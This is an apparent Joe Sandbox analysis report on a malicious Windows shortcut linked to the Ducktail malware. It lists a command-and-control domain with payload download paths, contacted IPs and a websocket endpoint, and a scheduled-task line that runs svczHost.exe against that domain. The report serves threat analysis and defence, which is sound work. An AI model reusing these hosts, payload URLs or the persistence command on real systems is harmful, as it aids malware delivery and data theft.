                      https://aka.ms/winsvr-2022-pshelpXzpowershell.exe, 00000007.00000002.3008017548.0000014000269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3383100273.000001F1C50FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3390080505.0000021E8022B000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://aka.ms/nativeaot-compatibilitymyRdpService.exe, 0000002C.00000002.4250949857.00007FF6E0306000.00000004.00000001.01000000.0000000A.sdmpfalse
                          		high
                          https://contoso.com/powershell.exe, 0000002D.00000002.4198497771.000002489007C000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.3178404159.000001B42EAB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3008017548.0000014001650000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3040028318.000001401007A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3820508680.000002B472857000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3820508680.000002B472714000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.4036505566.00000248814EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.4198497771.000002489007C000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://github.com/Pester/PesterXzpowershell.exe, 00000002.00000002.3106887553.000001B41EC6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3106887553.000001B41ECFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3008017548.0000014000269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3408697237.000002B4628D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3390080505.0000021E8022B000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.microsoft.cpowershell.exe, 00000007.00000002.3051426177.00000140750BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://schemas.microsoft.clpowershell.exe, 00000007.00000002.3054390136.0000014075599000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://uyt1n8ded9fb380.com/file3/118b0ccf6258fcd855ea3e43f821c430215052fb3eb9eca5064994f5c1e3552983powershell.exe, 00000002.00000002.3106887553.000001B41EE30000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.3106887553.000001B41EA41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3008017548.0000014000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3715659309.000001F1D4DAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3383100273.000001F1C4521000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000013.00000000.3353970114.00007FF7810CA000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000013.00000002.4255677574.00007FF780E3F000.00000004.00000001.01000000.00000009.sdmp, svczHost.exe, 00000013.00000002.4248447361.0000015B5FB46000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3408697237.000002B4626A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3390080505.0000021E80001000.00000004.00000800.00020000.00000000.sdmp, myRdpService.exe, myRdpService.exe, 0000002C.00000002.4251536366.00007FF6E060C000.00000002.00000001.01000000.0000000A.sdmp, myRdpService.exe, 0000002C.00000002.4250949857.00007FF6E0306000.00000004.00000001.01000000.0000000A.sdmp, powershell.exe, 0000002D.00000002.4036505566.0000024880001000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://.jpgpowershell.exe, 0000000B.00000002.3715659309.000001F1D4DAD000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000013.00000000.3353970114.00007FF7810CA000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000013.00000002.4248447361.0000015B5FB46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002C.00000002.4251536366.00007FF6E060C000.00000002.00000001.01000000.0000000A.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://schemas.microsoft.copowershell.exe, 00000007.00000002.3051426177.0000014075047000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.3178404159.000001B42EC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3178404159.000001B42EAB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3008017548.0000014001650000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3040028318.000001401007A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3820508680.000002B472857000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3820508680.000002B472714000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3680286724.0000021E901FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.4036505566.00000248814EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.4198497771.000002489007C000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000007.00000002.3008017548.0000014001378000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://aka.ms/winsvr-2022-pshelppowershell.exe, 0000001B.00000002.3390080505.0000021E81144000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3390080505.0000021E8022B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000002D.00000002.4036505566.0000024881396000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000007.00000002.3008017548.0000014000269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3383100273.000001F1C49C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3390080505.0000021E80D7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3390080505.0000021E8022B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000002D.00000002.4036505566.0000024881396000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://go.micropowershell.exe, 00000007.00000002.3008017548.0000014000E4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3408697237.000002B4638C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3390080505.0000021E80839000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3390080505.0000021E816CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3390080505.0000021E8132C000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://github.com/MartinKuschnik/WmiLightsvczHost.exe, 00000013.00000002.4248447361.0000015B5F248000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002C.00000002.4251536366.00007FF6E04C8000.00000002.00000001.01000000.0000000A.sdmp, myRdpService.exe, 0000002C.00000000.3904011963.00007FF6E04C8000.00000002.00000001.01000000.0000000A.sdmpfalse
                                              		high
                                              http://pesterbdd.com/images/Pester.pnghpowershell.exe, 00000007.00000002.3008017548.00000140014FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3008017548.00000140014D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.4036505566.0000024881396000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.microsoft.c10-1HtUupowershell.exe, 00000007.00000002.3051426177.00000140750BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://aka.ms/nativeaot-compatibilityypowershell.exe, 0000000B.00000002.3715659309.000001F1D4DAD000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000013.00000000.3353970114.00007FF7810CA000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000013.00000002.4248447361.0000015B5FB46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002C.00000002.4251536366.00007FF6E060C000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                		high
                                                https://contoso.com/Iconpowershell.exe, 0000002D.00000002.4198497771.000002489007C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://crl.microsof9powershell.exe, 00000007.00000002.3051426177.0000014075047000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://uyt1n8ded9fb380.com/filepowershell.exe, 00000002.00000002.3106887553.000001B4203D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05depowershell.exe, 00000002.00000002.3106887553.000001B4200B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://github.com/Pester/Pesterpowershell.exe, 0000002D.00000002.4036505566.0000024881396000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118007bceeepowershell.exe, 00000002.00000002.3106887553.000001B41EE30000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://uyt1n8ded9fb380.com/file2/703e90d03436817ef0c550cdab0733b4e7b1e8dce7d6d7e6af8c26ad2c61f0372bpowershell.exe, 00000007.00000002.3008017548.0000014000269000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://uyt1n8ded9fb380.com/file2/a931528c26e1c78e87bafbbfbe7cd3d2eb625e6900c36f7e4b647edf6907702d6apowershell.exe, 0000000B.00000002.3383100273.000001F1C4521000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3383100273.000001F1C472D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlXzpowershell.exe, 00000002.00000002.3106887553.000001B41EC6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3106887553.000001B41ECFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3008017548.0000014000269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3408697237.000002B4628D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3390080505.0000021E8022B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://uyt1n8ded9fb380.com/StaticFile/RdpService/12hsvczHost.exe, 00000013.00000002.4247349250.0000015B5E806000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://crl.microsofpowershell.exe, 00000007.00000002.3051426177.0000014075047000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000007.00000002.3008017548.0000014000269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3383100273.000001F1C49C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3390080505.0000021E80D7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3390080505.0000021E8022B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://aka.ms/nativeaot-compatibilityYmyRdpService.exe, 0000002C.00000002.4251536366.00007FF6E060C000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                          		high
                                                          https://github.com/Pester/Pesterhpowershell.exe, 00000007.00000002.3008017548.00000140014FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3008017548.00000140014D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.4036505566.0000024881396000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://uyt1n8ded9fb380.com/powershell.exe, 00000007.00000002.3051426177.000001407502F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlhpowershell.exe, 00000007.00000002.3008017548.00000140014FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3008017548.00000140014D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.4036505566.0000024881396000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118ce0b51c3powershell.exe, 00000002.00000002.3106887553.000001B41EE30000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://aka.ms/GlobalizationInvariantModepowershell.exe, 0000000B.00000002.3715659309.000001F1D4DAD000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000013.00000000.3353970114.00007FF7810CA000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000013.00000002.4255677574.00007FF780E3F000.00000004.00000001.01000000.00000009.sdmp, svczHost.exe, 00000013.00000002.4248447361.0000015B5FB46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, myRdpService.exe, 0000002C.00000002.4251536366.00007FF6E060C000.00000002.00000001.01000000.0000000A.sdmp, myRdpService.exe, 0000002C.00000002.4250949857.00007FF6E0306000.00000004.00000001.01000000.0000000A.sdmpfalse
                                                                		high
                                                                http://schemas.openxmlformapowershell.exe, 00000007.00000002.3054390136.0000014075599000.00000004.00000020.00020000.00000000.sdmptrue
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://aka.ms/pscore68powershell.exe, 00000002.00000002.3106887553.000001B41EA41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3008017548.0000014000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3383100273.000001F1C4521000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3408697237.000002B4626A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3390080505.0000021E80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.4036505566.0000024880001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://uyt1n8ded9fb380.com/file2/f3fcab55ab8559517835b15ceb841a5e426396ae9229b9cd92da986e6e90c4bf86powershell.exe, 00000002.00000002.3106887553.000001B41EE30000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3106887553.000001B41F0C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://uyt1n8ded9fb380.com/api/check(/svczHost.exe, 00000013.00000002.4247349250.0000015B5E806000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://uyt1n8ded9fb380.com:443/xsvczHost.exe, 00000013.00000002.4247349250.0000015B5E8B3000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000013.00000002.4247349250.0000015B5E8A6000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://uyt1n8ded9fb380.com/file2/30bb492ec87899a2b4a8fa5c9eeec469ac5d7939c1a666e89b2957d1443edc11d1powershell.exe, 0000000B.00000002.3383100273.000001F1C48C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://oneget.orgpowershell.exe, 00000007.00000002.3008017548.0000014001378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://pesterbdd.com/images/Pester.pngXzpowershell.exe, 00000002.00000002.3106887553.000001B41EC6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3106887553.000001B41ECFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3008017548.0000014000269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3408697237.000002B4628D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3390080505.0000021E8022B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://uyt1n8ded9fb380.com/file2/932cebe308ef0a27dd8559a84e000b81c7997ad8503bf075cd2ba01defa0b09f67powershell.exe, 00000002.00000002.3106887553.000001B41F119000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown

                                                                  World Map of Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public IPs

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  172.67.137.62
                                                                  		uyt1n8ded9fb380.comUnited States
                                                                  		13335CLOUDFLARENETUStrue
                                                                  206.206.126.252
                                                                  		unknownUnited States
                                                                  		13332HYPEENT-SJUSfalse
                                                                  23.88.71.29
                                                                  		unknownUnited States
                                                                  		18978ENZUINC-USfalse

                                                                  General Information

                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1551867
                                                                  Start date and time:2024-11-08 10:43:34 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 11m 4s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                  Run name:Suspected VM Detection
                                                                  Number of analysed new started processes analysed:47
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:gW6FHWNFzR.lnk
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.expl.evad.winLNK@67/55@1/3
                                                                  EGA Information:
                                                                  • Successful, ratio: 12.5%
                                                                  HCA Information:Failed
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .lnk

                                                                  Warnings

                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, backgroundTaskHost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 52.111.229.48, 52.109.8.89, 52.113.194.132, 52.109.16.113, 13.89.178.27, 142.250.80.67
                                                                  • Excluded domains from analysis (whitelisted): www.bing.com, prod.ols.live.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, onedscolprdcus03.centralus.cloudapp.azure.com, ctldl.windowsupdate.com, cus-config.officeapps.live.com, s-0005-office.config.skype.com, prod.nexusrules.live.com.akadns.net, ecs-office.s-0005.s-msedge.net, login.live.com, s-0005.s-msedge.net, config.officeapps.live.com, us.configsvc1.live.com.akadns.net, officeclient.microsoft.com, ecs.office.trafficmanager.net, www.gstatic.com, nexusrules.officeapps.live.com, ols.officeapps.live.com
                                                                  • Execution Graph export aborted for target myRdpService.exe, PID 7372 because there are no executed function
                                                                  • Execution Graph export aborted for target powershell.exe, PID 3340 because it is empty
                                                                  • Execution Graph export aborted for target powershell.exe, PID 5428 because it is empty
                                                                  • Execution Graph export aborted for target powershell.exe, PID 7720 because it is empty
                                                                  • Execution Graph export aborted for target powershell.exe, PID 8464 because it is empty
                                                                  • Execution Graph export aborted for target powershell.exe, PID 8620 because it is empty
                                                                  • Execution Graph export aborted for target svczHost.exe, PID 7664 because there are no executed function
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  • VT rate limit hit for: gW6FHWNFzR.lnk

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  TimeTypeDescription
                                                                  04:45:42API Interceptor19311x Sleep call for process: powershell.exe modified
                                                                  10:46:31Task SchedulerRun new task: zServicecakoi10 path: C:\Windows\Temp\svczHost.exe s>cakoi10 uyt1n8ded9fb380.com

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  172.67.137.62ZGMW2wgPzY.lnkGet hashmaliciousDucktailBrowse
                                                                  • uyt1n8ded9fb380.com/api/check
                                                                  z0gG2GA9vG.lnkGet hashmaliciousDucktailBrowse
                                                                  • uyt1n8ded9fb380.com/api/check
                                                                  Job-Description pdf lnk.lnkGet hashmaliciousDucktailBrowse
                                                                  • uyt1n8ded9fb380.com/api/check
                                                                  6GMmnAcpMs.lnkGet hashmaliciousDucktailBrowse
                                                                  • uyt1n8ded9fb380.com/api/check
                                                                  O5PR3i6ILA.lnkGet hashmaliciousUnknownBrowse
                                                                  • uyt1n8ded9fb380.com/api/check
                                                                  Mediatool-media-planning-guide lnk.lnkGet hashmaliciousDucktailBrowse
                                                                  • uyt1n8ded9fb380.com/api/check
                                                                  SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET lnk.lnkGet hashmaliciousUnknownBrowse
                                                                  • uyt1n8ded9fb380.com/api/check
                                                                  H71PKTiNjk.lnkGet hashmaliciousDucktailBrowse
                                                                  • uyt1n8ded9fb380.com/api/check
                                                                  YShfqKxCAU.lnkGet hashmaliciousDucktailBrowse
                                                                  • uyt1n8ded9fb380.com/api/check
                                                                  aQuwmiym51.lnkGet hashmaliciousDucktailBrowse
                                                                  • uyt1n8ded9fb380.com/api/check
                                                                  206.206.126.252U82W1yZAYQ.lnkGet hashmaliciousDucktailBrowse
                                                                  • 206.206.126.252:8008/client/ws
                                                                  ZGMW2wgPzY.lnkGet hashmaliciousDucktailBrowse
                                                                  • 206.206.126.252:8008/client/ws
                                                                  z0gG2GA9vG.lnkGet hashmaliciousDucktailBrowse
                                                                  • 206.206.126.252:8008/client/ws
                                                                  About-Us.docx lnk.lnkGet hashmaliciousDucktailBrowse
                                                                  • 206.206.126.252:8008/client/ws
                                                                  Job-Description pdf lnk.lnkGet hashmaliciousDucktailBrowse
                                                                  • 206.206.126.252:8008/client/ws
                                                                  6GMmnAcpMs.lnkGet hashmaliciousDucktailBrowse
                                                                  • 206.206.126.252:8008/client/ws
                                                                  Meeting-Registration pdf lnk.lnkGet hashmaliciousDucktailBrowse
                                                                  • 206.206.126.252:8008/client/ws
                                                                  Mediatool-media-planning-guide lnk.lnkGet hashmaliciousDucktailBrowse
                                                                  • 206.206.126.252:8008/client/ws
                                                                  K9ZFXlZRuI.lnkGet hashmaliciousDucktailBrowse
                                                                  • 206.206.126.252:8008/client/ws
                                                                  H71PKTiNjk.lnkGet hashmaliciousDucktailBrowse
                                                                  • 206.206.126.252:8008/client/ws

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  uyt1n8ded9fb380.comU82W1yZAYQ.lnkGet hashmaliciousDucktailBrowse
                                                                  • 104.21.86.219
                                                                  ZGMW2wgPzY.lnkGet hashmaliciousDucktailBrowse
                                                                  • 172.67.137.62
                                                                  z0gG2GA9vG.lnkGet hashmaliciousDucktailBrowse
                                                                  • 172.67.137.62
                                                                  About-Us.docx lnk.lnkGet hashmaliciousDucktailBrowse
                                                                  • 104.21.86.219
                                                                  Job-Description pdf lnk.lnkGet hashmaliciousDucktailBrowse
                                                                  • 172.67.137.62
                                                                  K05MQ5BcC8.lnkGet hashmaliciousUnknownBrowse
                                                                  • 104.21.86.219
                                                                  eQwUFcwrXk.lnkGet hashmaliciousDucktailBrowse
                                                                  • 104.21.86.219
                                                                  4YgQ2xN41W.lnkGet hashmaliciousDucktailBrowse
                                                                  • 104.21.86.219
                                                                  6GMmnAcpMs.lnkGet hashmaliciousDucktailBrowse
                                                                  • 172.67.137.62
                                                                  Meeting-Registration pdf lnk.lnkGet hashmaliciousDucktailBrowse
                                                                  • 104.21.86.219

                                                                  ASNs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  HYPEENT-SJUSU82W1yZAYQ.lnkGet hashmaliciousDucktailBrowse
                                                                  • 206.206.126.252
                                                                  ZGMW2wgPzY.lnkGet hashmaliciousDucktailBrowse
                                                                  • 206.206.126.252
                                                                  z0gG2GA9vG.lnkGet hashmaliciousDucktailBrowse
                                                                  • 206.206.126.252
                                                                  About-Us.docx lnk.lnkGet hashmaliciousDucktailBrowse
                                                                  • 206.206.126.252
                                                                  Job-Description pdf lnk.lnkGet hashmaliciousDucktailBrowse
                                                                  • 206.206.126.252
                                                                  6GMmnAcpMs.lnkGet hashmaliciousDucktailBrowse
                                                                  • 206.206.126.252
                                                                  Meeting-Registration pdf lnk.lnkGet hashmaliciousDucktailBrowse
                                                                  • 206.206.126.252
                                                                  Mediatool-media-planning-guide lnk.lnkGet hashmaliciousDucktailBrowse
                                                                  • 206.206.126.252
                                                                  K9ZFXlZRuI.lnkGet hashmaliciousDucktailBrowse
                                                                  • 206.206.126.252
                                                                  H71PKTiNjk.lnkGet hashmaliciousDucktailBrowse
                                                                  • 206.206.126.252
                                                                  CLOUDFLARENETUSU82W1yZAYQ.lnkGet hashmaliciousDucktailBrowse
                                                                  • 104.21.86.219
                                                                  https://www.capcut.com/download-guidance?download_url=https%3A%2F%2Flf16-capcut.faceulv.com%2Fobj%2Fcapcutpc-packages-us%2Finstaller%2Fcapcut_capcutpc_0_1.2.6_installer.exeGet hashmaliciousUnknownBrowse
                                                                  • 172.64.41.3
                                                                  ZGMW2wgPzY.lnkGet hashmaliciousDucktailBrowse
                                                                  • 172.64.41.3
                                                                  z0gG2GA9vG.lnkGet hashmaliciousDucktailBrowse
                                                                  • 172.67.137.62
                                                                  About-Us.docx lnk.lnkGet hashmaliciousDucktailBrowse
                                                                  • 104.21.86.219
                                                                  Job-Description pdf lnk.lnkGet hashmaliciousDucktailBrowse
                                                                  • 172.67.137.62
                                                                  K05MQ5BcC8.lnkGet hashmaliciousUnknownBrowse
                                                                  • 104.21.86.219
                                                                  eQwUFcwrXk.lnkGet hashmaliciousDucktailBrowse
                                                                  • 104.21.86.219
                                                                  4YgQ2xN41W.lnkGet hashmaliciousDucktailBrowse
                                                                  • 104.21.86.219
                                                                  6GMmnAcpMs.lnkGet hashmaliciousDucktailBrowse
                                                                  • 162.159.61.3
                                                                  ENZUINC-USU82W1yZAYQ.lnkGet hashmaliciousDucktailBrowse
                                                                  • 23.88.71.29
                                                                  ZGMW2wgPzY.lnkGet hashmaliciousDucktailBrowse
                                                                  • 23.88.71.29
                                                                  z0gG2GA9vG.lnkGet hashmaliciousDucktailBrowse
                                                                  • 23.88.71.29
                                                                  About-Us.docx lnk.lnkGet hashmaliciousDucktailBrowse
                                                                  • 23.88.71.29
                                                                  Job-Description pdf lnk.lnkGet hashmaliciousDucktailBrowse
                                                                  • 23.88.71.29
                                                                  6GMmnAcpMs.lnkGet hashmaliciousDucktailBrowse
                                                                  • 23.88.71.29
                                                                  Meeting-Registration pdf lnk.lnkGet hashmaliciousDucktailBrowse
                                                                  • 23.88.71.29
                                                                  Mediatool-media-planning-guide lnk.lnkGet hashmaliciousDucktailBrowse
                                                                  • 23.88.71.29
                                                                  K9ZFXlZRuI.lnkGet hashmaliciousDucktailBrowse
                                                                  • 23.88.71.29
                                                                  H71PKTiNjk.lnkGet hashmaliciousDucktailBrowse
                                                                  • 23.88.71.29

                                                                  JA3 Fingerprints

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  3b5074b1b5d032e5620f69f9f700ff0eU82W1yZAYQ.lnkGet hashmaliciousDucktailBrowse
                                                                  • 172.67.137.62
                                                                  ZGMW2wgPzY.lnkGet hashmaliciousDucktailBrowse
                                                                  • 172.67.137.62
                                                                  z0gG2GA9vG.lnkGet hashmaliciousDucktailBrowse
                                                                  • 172.67.137.62
                                                                  About-Us.docx lnk.lnkGet hashmaliciousDucktailBrowse
                                                                  • 172.67.137.62
